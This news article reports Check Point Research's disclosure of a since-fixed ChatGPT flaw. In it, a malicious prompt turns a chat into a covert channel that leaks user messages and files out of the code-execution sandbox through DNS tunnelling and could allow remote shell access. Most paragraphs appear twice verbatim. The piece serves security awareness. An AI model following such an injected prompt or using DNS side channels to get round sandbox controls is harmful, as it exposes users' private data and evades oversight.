A newly disclosed security flaw in ChatGPT exposed a basic weakness in the way users think about “safe” AI workspaces: data that appeared to be confined inside a chat could, under the right conditions, be siphoned out without any warning. The issue was described on March 30 by Check Point Research, which said a malicious prompt could turn an ordinary conversation into a covert exfiltration channel capable of leaking user messages, uploaded files and model-generated summaries. Independent reporting said OpenAI fixed the problem on February 20 and that there is no evidence it was exploited maliciously.
What makes the disclosure significant is not only the technical mechanics but the trust model it challenges. ChatGPT presents outbound sharing of sensitive information as restricted and subject to safeguards, particularly inside its code-execution and data-analysis environment. Check Point said it found a path around those protections by exploiting a hidden communication route from the isolated runtime to the public internet, allowing information to leave the environment without triggering a visible approval flow. That matters because many users now place contracts, financial records, medical documents and other sensitive material inside AI systems in the belief that the runtime boundary is hard.
According to the researchers, the attack did not require a complex sequence of actions from the victim. A single malicious prompt, they said, could prime the conversation so that later messages became a source of leakage. The data taken did not have to be entire files. The prompt could instead direct the model to extract only the most valuable parts of a conversation or document, such as identifying details, financial conclusions, legal summaries or medical assessments. That selective approach would make exfiltration harder to notice and potentially more useful to an attacker.
The technical route described by Check Point centred on DNS tunnelling. While the runtime blocked normal outbound internet access, DNS resolution remained available as part of normal system operation. The researchers said data could be encoded into DNS-safe fragments and sent out through hostname lookups, while small instructions could be returned through DNS responses, creating a bidirectional side channel. In practical terms, that turned ordinary resolver traffic into a hidden transport path between the sandboxed runtime and an attacker-controlled server. Security researchers have long regarded this class of problem as difficult because it exploits infrastructure that is often treated as benign or essential.
Check Point went further, saying the same pathway could support remote shell access inside the Linux container used for code execution. That raised the severity of the issue from passive leakage to the possibility of active command execution within the runtime. The researchers said commands sent through this side channel would bypass the usual conversational safety mediation because the results could go directly back to the attacker rather than appearing in the chat. Even as a proof of concept, that finding will sharpen scrutiny of AI sandboxes that promise isolation while still relying on background network functions to operate.
OpenAI’s broader security posture suggests the company already views prompt injection and data exfiltration as a central risk area. In February, it introduced Lockdown Mode and elevated-risk labels in ChatGPT, saying the setting was designed to constrain how the assistant interacts with external systems and reduce prompt-injection-based leakage. Days later, it also launched a safety bug bounty programme that explicitly includes third-party prompt injection and data exfiltration among the issues it wants researchers to report. Those moves do not prove anticipation of this exact flaw, but they show the company has been hardening controls around the same threat category.
The episode also fits a wider pattern across the AI industry. Security work published this year argues that prompt injection should be treated as a first-class vulnerability rather than a niche quirk of chatbots. A January systematic analysis of agentic coding assistants said modern AI tools that browse, read files, execute commands and connect to outside systems create an expanded attack surface that traditional defences struggle to contain. OWASP already ranks prompt injection at the top of its risk list for LLM applications, while policy and standards discussions increasingly frame indirect prompt injection as one of generative AI’s hardest security problems to solve cleanly.
What makes the disclosure significant is not only the technical mechanics but the trust model it challenges. ChatGPT presents outbound sharing of sensitive information as restricted and subject to safeguards, particularly inside its code-execution and data-analysis environment. Check Point said it found a path around those protections by exploiting a hidden communication route from the isolated runtime to the public internet, allowing information to leave the environment without triggering a visible approval flow. That matters because many users now place contracts, financial records, medical documents and other sensitive material inside AI systems in the belief that the runtime boundary is hard.
According to the researchers, the attack did not require a complex sequence of actions from the victim. A single malicious prompt, they said, could prime the conversation so that later messages became a source of leakage. The data taken did not have to be entire files. The prompt could instead direct the model to extract only the most valuable parts of a conversation or document, such as identifying details, financial conclusions, legal summaries or medical assessments. That selective approach would make exfiltration harder to notice and potentially more useful to an attacker.
The technical route described by Check Point centred on DNS tunnelling. While the runtime blocked normal outbound internet access, DNS resolution remained available as part of normal system operation. The researchers said data could be encoded into DNS-safe fragments and sent out through hostname lookups, while small instructions could be returned through DNS responses, creating a bidirectional side channel. In practical terms, that turned ordinary resolver traffic into a hidden transport path between the sandboxed runtime and an attacker-controlled server. Security researchers have long regarded this class of problem as difficult because it exploits infrastructure that is often treated as benign or essential.
Check Point went further, saying the same pathway could support remote shell access inside the Linux container used for code execution. That raised the severity of the issue from passive leakage to the possibility of active command execution within the runtime. The researchers said commands sent through this side channel would bypass the usual conversational safety mediation because the results could go directly back to the attacker rather than appearing in the chat. Even as a proof of concept, that finding will sharpen scrutiny of AI sandboxes that promise isolation while still relying on background network functions to operate.
OpenAI’s broader security posture suggests the company already views prompt injection and data exfiltration as a central risk area. In February, it introduced Lockdown Mode and elevated-risk labels in ChatGPT, saying the setting was designed to constrain how the assistant interacts with external systems and reduce prompt-injection-based leakage. Days later, it also launched a safety bug bounty programme that explicitly includes third-party prompt injection and data exfiltration among the issues it wants researchers to report. Those moves do not prove anticipation of this exact flaw, but they show the company has been hardening controls around the same threat category.
The episode also fits a wider pattern across the AI industry. Security work published this year argues that prompt injection should be treated as a first-class vulnerability rather than a niche quirk of chatbots. A January systematic analysis of agentic coding assistants said modern AI tools that browse, read files, execute commands and connect to outside systems create an expanded attack surface that traditional defences struggle to contain. OWASP already ranks prompt injection at the top of its risk list for LLM applications, while policy and standards discussions increasingly frame indirect prompt injection as one of generative AI’s hardest security problems to solve cleanly.
Topics
Technology